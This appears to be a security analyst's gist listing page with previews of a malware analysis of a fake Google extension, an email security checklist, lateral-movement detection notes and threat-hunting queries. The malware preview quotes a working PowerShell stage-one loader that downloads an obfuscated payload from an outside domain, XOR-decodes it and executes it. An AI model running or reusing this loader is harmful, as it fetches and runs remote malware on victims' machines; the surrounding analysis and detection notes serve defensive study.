Ali Hussein 0xAnalyst
0xAnalyst
/ FakeGoogleExtension
Created
July 17, 2024 09:34
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Stage 1 | |
| $w=new-object System.Net.Webclient;$bs=$w.DownloadString("https://two-root.com/2506s.bs64");[Byte[]] $x=[Convert]::FromBase64String($bs.Replace("!","b").Replace("@","h").Replace("$","m").Replace("%","p").Replace("^","v"));for($i=0;$i -lt $x.Count;$i++){$x[$i]= ($x[$i] -bxor 167) -bxor 18};iex([System.Text.Encoding]::UTF8.GetString($x)) | |
| #Decoded Powershell | |
| function xvbAo | |
| { | |
| param ( | |
| $HexString |
0xAnalyst
/ Email Security
Last active
October 15, 2019 10:57
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1- Implement Standards | |
| 1- SPF/DKIM/DMARC | |
| 2- Content Filters | |
| 3- Block Extensions | |
| 4- look for Malicious Objects/Data | |
| RTF documents- \objupdate, \objdata |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| By Protocols / Services | |
| 1- Server Message Block ( SMB ) | |
| 2- Service Control Manager (SCM) | |
| 2- Task Scheduler | |
| 3- Windows Management Instrumentation ( WMI ) | |
| 3-1 WMI Activity Event log | |
| Event ID 2 - win32_process::Create | |
| 4- Windows Remote Management ( WinRM ) | |
| winrshost.exe as parent - 4688 |
0xAnalyst
/ Threat Hunting
Last active
May 7, 2025 09:59
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1- T1174 - Password Filter - Catch malicious password filters event log | |
| index=wineventlog EventID=4614 | |
| AND NOT NotificationPackageName IN ("scecli", "RASSFM", "WDIGEST", "KDCSVC", "KDCPW") | |
| Reference | |
| https://twitter.com/xknow_infosec/status/1178747476976820228 | |
| 2- T1113 - Screen capture | |
| look for nircmd executions | |
| powershell execution with screenshot in arguments | |
| 3- T1074 - Data Staged | |
| enable object auditing files and folder - EventID 4663 - look for copying of different files in a short time span. Use bro |